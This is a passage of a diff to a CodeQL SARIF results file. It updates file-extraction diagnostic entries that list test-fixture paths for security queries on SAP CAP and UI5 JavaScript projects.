}, { + "name" : "generated/extension-pack", + "semanticVersion" : "0.0.0", + "locations" : [ { + "uri" : "file:///home/runner/work/_temp/codeql_databases/javascript/temp/extension-pack/", + "description" : { + "text" : "The QL pack root directory." 
+ } + }, { + "uri" : "file:///home/runner/work/_temp/codeql_databases/javascript/temp/extension-pack/codeql-pack.yml", + "description" : { + "text" : "The QL pack definition file." + } + } ], + "properties" : { + "isCodeQLModelPack" : true + } } ] }, "invocations" : [ { @@ -3100,9 +3076,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : ".github/actions/install-codeql/action.yml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 5 + "index" : 0 } } } ], @@ -3114,7 +3090,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3126,9 +3102,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : ".github/actions/install-qlt/action.yml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 6 + "index" : 1 } } } ], @@ -3140,7 +3116,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3152,9 +3128,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/cap/ext/ext/codeql-pack.lock.yml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 7 + "index" : 2 } } } ], @@ -3166,7 +3142,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -3178,9 +3154,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : ".github/codeql/codeql-config.yaml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 8 + "index" : 3 } } } ], @@ -3192,7 +3168,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3204,9 +3180,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/cap/ext/ext/qlpack.yml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 9 + "index" : 4 } } } ], @@ -3218,7 +3194,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3230,9 +3206,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/codeql-pack.lock.yml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 10 + "index" : 5 } } } ], @@ -3244,7 +3220,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3256,9 +3232,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/ui5.model.yml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 11 + "index" : 6 } } } ], 
@@ -3270,7 +3246,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3282,9 +3258,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/qlpack.yml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 12 + "index" : 7 } } } ], @@ -3296,7 +3272,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3308,9 +3284,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/additional-sources.model.yml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 13 + "index" : 8 } } } ], @@ -3322,7 +3298,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3334,9 +3310,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/codeql-pack.lock.yml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 14 + "index" : 9 } } } ], @@ -3348,7 +3324,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -3360,9 +3336,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/qlpack.yml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 15 + "index" : 10 } } } ], @@ -3374,7 +3350,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3386,9 +3362,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : ".github/workflows/code_scanning.yml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 16 + "index" : 11 } } } ], @@ -3400,7 +3376,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3412,9 +3388,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : ".github/workflows/run-codeql-unit-tests-javascript.yml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 17 + "index" : 12 } } } ], @@ -3426,7 +3402,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3438,9 +3414,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "codeql-workspace.yml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 18 + "index" : 13 } } } ], 
@@ -3452,7 +3428,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3464,9 +3440,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/lib/codeql-pack.lock.yml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 19 + "index" : 14 } } } ], @@ -3478,7 +3454,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3490,9 +3466,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/src/codeql-pack.lock.yml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 20 + "index" : 15 } } } ], @@ -3504,7 +3480,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3516,9 +3492,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/lib/qlpack.yml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 21 + "index" : 16 } } } ], @@ -3530,7 +3506,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -3542,9 +3518,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/src/qlpack.yml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 22 + "index" : 17 } } } ], @@ -3556,7 +3532,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3568,9 +3544,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/codeql-pack.lock.yml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 23 + "index" : 18 } } } ], @@ -3582,7 +3558,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3594,9 +3570,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/qlpack.yml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 24 + "index" : 19 } } } ], @@ -3608,7 +3584,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3620,9 +3596,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/db/schema.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 25 + "index" : 20 } } } ], 
@@ -3634,7 +3610,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3646,9 +3622,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/package.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 26 + "index" : 21 } } } ], @@ -3660,7 +3636,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3672,9 +3648,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/server.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 27 + "index" : 22 } } } ], @@ -3686,7 +3662,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3698,9 +3674,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 28 + "index" : 23 } } } ], @@ -3712,7 +3688,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -3724,9 +3700,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 29 + "index" : 24 } } } ], @@ -3738,7 +3714,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3750,9 +3726,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 30 + "index" : 25 } } } ], @@ -3764,7 +3740,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3776,9 +3752,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 31 + "index" : 26 } } } ], @@ -3790,7 +3766,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -3802,9 +3778,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/db/schema.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 32 + "index" : 27 } } } ], @@ -3816,7 +3792,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3828,9 +3804,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/server.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 33 + "index" : 28 } } } ], @@ -3842,7 +3818,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3854,9 +3830,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/package.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 34 + "index" : 29 } } } ], @@ -3868,7 +3844,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -3880,9 +3856,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 35 + "index" : 30 } } } ], @@ -3894,7 +3870,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3906,9 +3882,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 36 + "index" : 31 } } } ], @@ -3920,7 +3896,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3932,9 +3908,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 37 + "index" : 32 } } } ], @@ -3946,7 +3922,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -3958,9 +3934,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 38 + "index" : 33 } } } ], @@ -3972,7 +3948,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3984,9 +3960,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/db/schema.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 39 + "index" : 34 } } } ], @@ -3998,7 +3974,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4010,9 +3986,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/package.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 40 + "index" : 35 } } } ], @@ -4024,7 +4000,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -4036,9 +4012,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/server.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 41 + "index" : 36 } } } ], @@ -4050,7 +4026,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4062,9 +4038,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 42 + "index" : 37 } } } ], @@ -4076,7 +4052,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4088,9 +4064,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 43 + "index" : 38 } } } ], @@ -4102,7 +4078,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -4114,9 +4090,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 44 + "index" : 39 } } } ], @@ -4128,7 +4104,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4140,9 +4116,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 45 + "index" : 40 } } } ], @@ -4154,7 +4130,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4166,9 +4142,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/db/schema.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 46 + "index" : 41 } } } ], @@ -4180,7 +4156,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -4192,9 +4168,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/package.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 47 + "index" : 42 } } } ], @@ -4206,7 +4182,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4218,9 +4194,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 48 + "index" : 43 } } } ], @@ -4232,7 +4208,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4244,9 +4220,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/server.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 49 + "index" : 44 } } } ], @@ -4258,7 +4234,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -4270,9 +4246,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 50 + "index" : 45 } } } ], @@ -4284,7 +4260,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4296,9 +4272,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 51 + "index" : 46 } } } ], @@ -4310,7 +4286,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4322,9 +4298,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 52 + "index" : 47 } } } ], @@ -4336,7 +4312,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -4348,9 +4324,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/db/schema.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 53 + "index" : 48 } } } ], @@ -4362,7 +4338,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4374,9 +4350,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/package.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 54 + "index" : 49 } } } ], @@ -4388,7 +4364,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4400,9 +4376,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/server.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 55 + "index" : 50 } } } ], @@ -4414,7 +4390,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -4426,9 +4402,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/privileged-user.js", + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.json", "uriBaseId" : "%SRCROOT%", - "index" : 56 + "index" : 51 } } } ], @@ -4440,7 +4416,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4452,9 +4428,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 57 + "index" : 52 } } } 